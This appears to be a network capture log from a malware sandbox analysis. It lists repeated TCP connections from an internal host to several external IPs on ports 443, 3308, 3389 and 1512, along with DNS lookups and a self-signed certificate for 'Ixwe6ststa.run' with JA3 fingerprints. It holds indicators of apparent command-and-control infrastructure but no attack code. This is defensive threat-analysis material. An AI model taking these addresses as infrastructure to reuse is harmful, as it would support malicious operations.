Jan 12, 2021 07:45:38.524113894 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.524291039 CET	49400	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:38.528179884 CET	49400	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:38.528330088 CET	49400	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:38.580310106 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.580414057 CET	49400	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:38.618702888 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.632512093 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.632571936 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.751349926 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.751398087 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.751564026 CET	49400	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:38.755283117 CET	49400	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:38.807389021 CET	443	49400	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:38.856425047 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:38.899889946 CET	3308	49401	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:38.900091887 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:38.901477098 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:38.944603920 CET	3308	49401	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:38.957005024 CET	3308	49401	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:38.957077026 CET	3308	49401	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:38.957257032 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:38.971371889 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:39.016506910 CET	3308	49401	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:39.016803980 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:39.026520967 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:39.026621103 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:39.069899082 CET	3308	49401	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:39.070070028 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:39.113352060 CET	3308	49401	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:39.225178003 CET	3308	49401	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:39.225223064 CET	3308	49401	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:39.225524902 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:39.228281021 CET	49401	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:39.271523952 CET	3308	49401	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:39.345010042 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.399144888 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.399271011 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.400839090 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.455208063 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.484599113 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.484659910 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.484709024 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.484746933 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.499018908 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.560144901 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.560460091 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.570138931 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.570379019 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.624349117 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.624598980 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.664239883 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.678654909 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.678719044 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.769572020 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.769642115 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.769691944 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.769726992 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.775408030 CET	49402	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:39.829504967 CET	3389	49402	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:39.890722990 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:39.944010019 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:39.944107056 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:39.945667982 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:39.999016047 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.005949974 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.006015062 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.006041050 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:40.006067038 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:40.020998001 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:40.075278997 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.075599909 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:40.085009098 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:40.085406065 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:40.138375998 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.138660908 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:40.178013086 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.191664934 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.191703081 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.292937040 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.292982101 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.293164015 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:40.298981905 CET	49403	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:40.352077007 CET	1512	49403	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:40.427603006 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.480143070 CET	443	49404	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:40.480320930 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.481731892 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.533911943 CET	443	49404	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:40.549096107 CET	443	49404	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:40.549254894 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.563803911 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.618427992 CET	443	49404	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:40.618738890 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.628048897 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.628274918 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.680545092 CET	443	49404	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:40.680874109 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.733079910 CET	443	49404	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:40.851381063 CET	443	49404	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:40.851452112 CET	443	49404	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:40.851495028 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.851543903 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.853585005 CET	49404	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:40.905919075 CET	443	49404	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:40.967087030 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.010498047 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.010664940 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.012155056 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.055269003 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.074282885 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.074331045 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.074485064 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.090735912 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.137461901 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.137635946 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.143172026 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.143326044 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.186477900 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.186589003 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.226804018 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.229897976 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.229967117 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.342725039 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.342770100 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.342972040 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.345694065 CET	49405	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:41.388812065 CET	3308	49405	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:41.466813087 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.522450924 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.522553921 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.524159908 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.579313040 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.617666006 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.617692947 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.617986917 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.631572008 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.691189051 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.691498041 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.701689959 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.701844931 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.755953074 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.756305933 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.795150042 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.810771942 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.810789108 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.901302099 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.901334047 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:41.901633978 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.907309055 CET	49406	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:41.961929083 CET	3389	49406	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:42.027983904 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.080935001 CET	1512	49407	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:42.081058979 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.082648993 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.135313988 CET	1512	49407	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:42.142394066 CET	1512	49407	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:42.142409086 CET	1512	49407	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:42.142502069 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.159924984 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.213838100 CET	1512	49407	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:42.214096069 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.224411011 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.224745989 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.277473927 CET	1512	49407	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:42.277806997 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.330646038 CET	1512	49407	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:42.435024023 CET	1512	49407	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:42.435066938 CET	1512	49407	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:42.435292959 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.441262007 CET	49407	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:42.494172096 CET	1512	49407	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:42.572513103 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:42.624433041 CET	443	49408	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:42.624541998 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:42.626066923 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:42.677788973 CET	443	49408	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:42.692789078 CET	443	49408	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:42.692903042 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:42.708268881 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:42.762487888 CET	443	49408	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:42.762723923 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:42.772241116 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:42.772418022 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:42.824654102 CET	443	49408	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:42.824809074 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:42.862920046 CET	443	49408	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:42.878158092 CET	443	49408	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:42.995433092 CET	443	49408	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:42.995507956 CET	443	49408	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:42.995711088 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:43.001310110 CET	49408	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:43.053025007 CET	443	49408	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:43.115041018 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.158092976 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.158189058 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.159199953 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.202414036 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.214601994 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.214662075 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.214690924 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.214724064 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.222081900 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.267472982 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.267721891 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.272686958 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.272810936 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.316199064 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.316479921 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.356075048 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.359719038 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.359786034 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.472815037 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.472856998 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.473174095 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.478827953 CET	49409	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:43.522135973 CET	3308	49409	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:43.584243059 CET	49410	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:43.637980938 CET	3389	49410	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:43.638081074 CET	49410	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:43.639626980 CET	49410	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:43.693461895 CET	3389	49410	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:43.737164021 CET	3389	49410	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:43.737219095 CET	3389	49410	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:43.737380028 CET	49410	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:43.737428904 CET	49410	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:43.749016047 CET	49410	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:43.802858114 CET	3389	49410	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:43.808851957 CET	3389	49410	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:43.808990002 CET	49410	3389	192.168.2.22	5.100.228.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2021 07:43:27.014373064 CET	52197	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:43:27.229727983 CET	53	52197	8.8.8.8	192.168.2.22
Jan 12, 2021 07:43:27.891366959 CET	53099	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:43:27.939203024 CET	53	53099	8.8.8.8	192.168.2.22
Jan 12, 2021 07:43:27.946752071 CET	52838	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:43:27.994427919 CET	53	52838	8.8.8.8	192.168.2.22
Jan 12, 2021 07:43:28.559076071 CET	61200	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:43:28.606836081 CET	53	61200	8.8.8.8	192.168.2.22
Jan 12, 2021 07:43:28.612761021 CET	49548	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:43:28.668925047 CET	53	49548	8.8.8.8	192.168.2.22
Jan 12, 2021 07:44:05.943444014 CET	55627	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:44:05.991348028 CET	53	55627	8.8.8.8	192.168.2.22
Jan 12, 2021 07:44:06.011027098 CET	56009	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:44:06.058880091 CET	53	56009	8.8.8.8	192.168.2.22
Jan 12, 2021 07:44:07.279355049 CET	61865	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:44:07.327223063 CET	53	61865	8.8.8.8	192.168.2.22
Jan 12, 2021 07:44:07.350521088 CET	55171	53	192.168.2.22	8.8.8.8
Jan 12, 2021 07:44:07.401139021 CET	53	55171	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 12, 2021 07:43:27.014373064 CET	192.168.2.22	8.8.8.8	0x7e45	Standard query (0)	media-server.skyinternet.com.pk	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 12, 2021 07:43:27.229727983 CET	8.8.8.8	192.168.2.22	0x7e45	No error (0)	media-server.skyinternet.com.pk	217.174.149.3	A (IP address)	IN (0x0001)
Jan 12, 2021 07:44:07.327223063 CET	8.8.8.8	192.168.2.22	0x20ec	No error (0)	cdn.digicertcdn.com	104.18.10.39	A (IP address)	IN (0x0001)
Jan 12, 2021 07:44:07.327223063 CET	8.8.8.8	192.168.2.22	0x20ec	No error (0)	cdn.digicertcdn.com	104.18.11.39	A (IP address)	IN (0x0001)
Jan 12, 2021 07:44:07.401139021 CET	8.8.8.8	192.168.2.22	0x3a02	No error (0)	cdn.digicertcdn.com	104.18.11.39	A (IP address)	IN (0x0001)
Jan 12, 2021 07:44:07.401139021 CET	8.8.8.8	192.168.2.22	0x3a02	No error (0)	cdn.digicertcdn.com	104.18.10.39	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 12, 2021 07:43:27.414814949 CET	217.174.149.3	443	192.168.2.22	49167	CN=www.media-server.skyinternet.com.pk CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Fri Nov 20 18:15:41 CET 2020 Thu Mar 17 17:40:46 CET 2016	Thu Feb 18 18:15:41 CET 2021 Wed Mar 17 17:40:46 CET 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Jan 12, 2021 07:43:27.414814949 CET	217.174.149.3	443	192.168.2.22	49167	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021		7dcce5b76c8b17472d024758970a406b
Jan 12, 2021 07:43:33.658950090 CET	77.220.64.37	443	192.168.2.22	49170	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:43:37.826246977 CET	77.220.64.37	443	192.168.2.22	49174	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:43:39.901704073 CET	77.220.64.37	443	192.168.2.22	49178	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:43:41.993721008 CET	77.220.64.37	443	192.168.2.22	49182	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:43:44.079883099 CET	77.220.64.37	443	192.168.2.22	49186	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:43:46.137309074 CET	77.220.64.37	443	192.168.2.22	49190	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:43:48.184794903 CET	77.220.64.37	443	192.168.2.22	49194	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:43:50.256206989 CET	77.220.64.37	443	192.168.2.22	49198	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:43:52.587001085 CET	77.220.64.37	443	192.168.2.22	49202	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 12, 2021 07:43:55.827255964 CET	77.220.64.37	443	192.168.2.22	49206	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
